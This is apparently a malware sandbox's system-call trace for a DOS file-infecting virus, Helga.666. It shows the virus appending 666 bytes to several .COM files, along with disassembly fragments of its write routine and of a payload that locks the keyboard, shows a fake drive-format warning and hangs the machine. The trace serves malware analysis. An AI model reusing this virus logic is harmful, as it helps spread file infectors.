Sample viewer

vx.netlux.org/Virus.DOS.Helga.666.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:14.653043722Z 26 PC: 12aa4 | Set disk transfer address
2018-12-17T23:06:14.654474792Z 78 PC: 12ab7 | Find first file
2018-12-17T23:06:14.661853265Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.663372992Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.670144093Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.68932777Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:14.697627966Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.699846187Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:14.717693351Z 66 PC: 12b19 | Move file pointer
2018-12-17T23:06:14.719794792Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-17T23:06:14.72314415Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:14.733402757Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:14.736167185Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:14.743953174Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:14.746255372Z 62 PC: 12b66 | Close file
2018-12-17T23:06:14.755844541Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:14.766829174Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:14.769793457Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.772043016Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.779030123Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.789503003Z 61 PC: 12c51 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:06:14.7981705Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.800873181Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:14.808602944Z 66 PC: 12b19 | Move file pointer
2018-12-17T23:06:14.81140379Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-17T23:06:14.814525168Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:14.824358767Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:14.827182025Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:14.834751617Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:14.836798786Z 62 PC: 12b66 | Close file
2018-12-17T23:06:14.846292666Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:14.858257681Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:14.861652564Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.877007584Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.884272883Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.897373324Z 61 PC: 12c51 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:06:14.905095383Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.90851432Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:14.9160668Z 66 PC: 12b19 | Move file pointer
2018-12-17T23:06:14.918113428Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-17T23:06:14.922288407Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:14.931521277Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:14.933468188Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:14.942369904Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:14.944143228Z 62 PC: 12b66 | Close file
2018-12-17T23:06:14.952773794Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:14.964232117Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:14.967236586Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.968593698Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.975178969Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.986798706Z 61 PC: 12c51 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:06:14.994004002Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.995709259Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.003910137Z 66 PC: 12b19 | Move file pointer
2018-12-17T23:06:15.005815329Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-17T23:06:15.008987854Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.019578005Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.021631295Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.029239409Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.032376638Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.04223866Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.053630247Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.05720057Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.058839852Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.0650827Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.076956394Z 61 PC: 12c51 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:06:15.08462963Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.086704492Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.094006991Z 66 PC: 12b19 | Move file pointer
2018-12-17T23:06:15.097006751Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-17T23:06:15.099989008Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.109254248Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.111842955Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.119683807Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.121476577Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.131457493Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.142322621Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.144963746Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.146490166Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.153143946Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.163558687Z 61 PC: 12c51 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:06:15.175998446Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.179172132Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.187017393Z 66 PC: 12b19 | Move file pointer
2018-12-17T23:06:15.189022543Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-17T23:06:15.193288112Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.203128073Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.204957372Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.213256255Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.21508313Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.223729746Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.235038077Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.238593502Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.239818876Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.245999576Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.257174136Z 61 PC: 12c51 | Open file (Filename = 'PAH.COM')
2018-12-17T23:06:15.264282291Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.26607446Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.273680751Z 66 PC: 12b19 | Move file pointer
2018-12-17T23:06:15.275199496Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-17T23:06:15.277728752Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.286975657Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.288438868Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.295323492Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.29725885Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.305552995Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.316733876Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.320726593Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.322712016Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.329106428Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.33878736Z 61 PC: 12c51 | Open file (Filename = 'TEST.COM')
2018-12-17T23:06:15.346488358Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.348337274Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.354556698Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.356160673Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.361933297Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.374783397Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.378193809Z 78 PC: 12c06 | Find first file
2018-12-17T23:06:15.387620763Z 78 PC: 12c06 | Find first file
2018-12-17T23:06:15.392184744Z 78 PC: 12b97 | Find first file
2018-12-17T23:06:15.397328013Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl
0x12cc7: je 0x12cca
0x12cc9: ret
0x12cca: cli
0x12ccb: mov al, 0xad
0x12ccd: out 0x64, al
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218
0x12cd7: mov ah, 9
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
2018-12-17T23:06:15.399208178Z 26 PC: 12ad6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.453721632Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.462566126Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.468801405Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.469919811Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.490400707Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.50566423Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.513138392Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.515630006Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.522663378Z 66 PC: 12b19 | Move file pointer
2018-12-25T12:43:30.524367326Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-25T12:43:30.527334968Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.540149088Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.541824017Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.548564676Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.551054104Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.558904498Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.568804076Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.572348632Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.573476799Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.579636925Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.590405076Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.59712633Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.598692462Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.60676891Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.608331102Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.610945446Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.619996625Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.635221427Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.642364654Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.646575357Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.654470336Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.664690349Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.668397195Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.670257756Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.676075422Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.687370538Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.693906119Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.695344051Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.710094914Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.722826257Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.725500284Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.733728709Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.735806655Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.742224061Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.7437164Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.754226458Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.764297671Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.769378939Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.772590495Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.781359145Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.794305508Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.802121495Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.803676933Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.8099819Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.8118827Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.81472819Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.823058718Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.824947469Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.832477399Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.834218784Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.842822304Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.853246196Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.855917737Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.857388911Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.863622259Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.881755676Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.888770951Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.891919836Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.899057987Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.900711534Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.904622155Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.913386054Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.915107833Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.925032076Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.926727002Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.934536635Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.945526268Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.948368206Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.949812165Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.956683516Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.966352216Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.973312059Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.97531824Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.981830184Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.983520079Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.987300603Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.996640235Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.998362484Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.00608673Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.008041851Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.015827688Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.026212982Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.029971626Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.031293462Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.038209927Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.047852708Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.054410394Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.056525786Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.062879399Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.064524379Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.06729021Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.076374928Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.077668123Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.081839532Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.083475675Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.08856907Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.094764547Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.096999958Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.097927222Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.10141796Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.108024875Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.113528488Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.114649871Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.117077522Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.118221846Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.140895644Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.313098687Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.316421633Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:31.322505362Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:31.333737511Z 78 PC: 12b97 | Find first file
2018-12-25T12:43:31.344579596Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl
0x12cc7: je 0x12cca
0x12cc9: ret
0x12cca: cli
0x12ccb: mov al, 0xad
0x12ccd: out 0x64, al
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218
0x12cd7: mov ah, 9
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
2018-12-25T12:43:31.347256504Z 9 PC: 12cdb | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.416409908Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.418535183Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.425993462Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.427248282Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.434490566Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.449738712Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.457089152Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.459191378Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.466162416Z 66 PC: 12b19 | Move file pointer
2018-12-25T12:43:30.467818606Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-25T12:43:30.470726795Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.482022805Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.484000907Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.492128665Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.498835683Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.505592678Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.517067035Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.520626688Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.521996793Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.528582665Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.542097706Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.556927592Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.558656275Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.569486504Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.571118215Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.573824195Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.583714764Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.585636401Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.593396988Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.596109194Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.604893671Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.615809207Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.619697905Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.621171231Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.627450655Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.639276333Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.648030975Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.650015948Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.657549802Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.6602285Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.663127088Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.672537162Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.675213826Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.682397385Z 87 PC: 12b60 | Get or set file date and time (See above)
